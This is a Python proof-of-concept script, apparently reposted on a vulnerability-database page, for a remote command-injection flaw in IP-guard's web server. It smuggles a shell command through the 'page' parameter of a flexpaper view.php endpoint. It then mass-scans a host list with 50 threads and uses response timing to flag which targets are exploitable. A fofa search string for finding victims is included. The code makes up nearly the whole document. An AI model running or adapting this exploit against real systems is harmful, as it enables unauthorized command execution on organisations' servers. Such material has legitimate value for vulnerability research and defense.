#!/usr/bin/python3 # -*- coding:utf-8 -*- # author:MDSEC # from:https://github.com/MD-SEC/MDPOCS # fofa:"IP-guard" && icon_hash="2030860561" # import sys import requests import csv import urllib3 import hashlib from concurrent.futures import ThreadPoolExecutor import time if len(sys.argv) != 2: print( '+----------------------------------------------------------------------------------------------------------+') print( '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS +') print( '+-------------------------------------------------------------------------------------------------- -------+') print( '+ USE: python3 <filename> <hosts.txt> +') print( '+ EXP: python3 Ip_Guard_Webserver_View_Rce_Poc.py url.txt +') print( '+-------------------------------------------------------------------------------------------------- --------+') sys.exit() proxysdata = { 'http': '' } def poc(host): if "http" in host: url = host else: url ="http://"+host host1=url.replace("http://","") host2=host1.replace("https://","") headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate, br", "Host":"%s" % host2 } vulurl = url + "/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20www.baidu.com" try: start_time = time.time() r = requests.get(vulurl, headers=headers) end_time = time.time() response_time = end_time - start_time if r.status_code==200 and response_time >2 and response_time<6 : print(host+" :一定能打") elif r.status_code==200: print(host+" :大概率能打") else: print(host+" :不能打") except: return 0 print (host+":false") if __name__ == '__main__': file = sys.argv[1] data = open(file) reader = csv.reader(data) with ThreadPoolExecutor(50) as pool: for row in reader: pool.submit(poc, row[0])
Unavailable Temp Solutions
Unavailable Official solution
Unavailable Defense Solutions
※Any content provided by this site, only to learn the code and services, not for illegal purposes
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
please call the customer service hotline to recharge, thank you for your continued support Seebug!
Unavailable Comments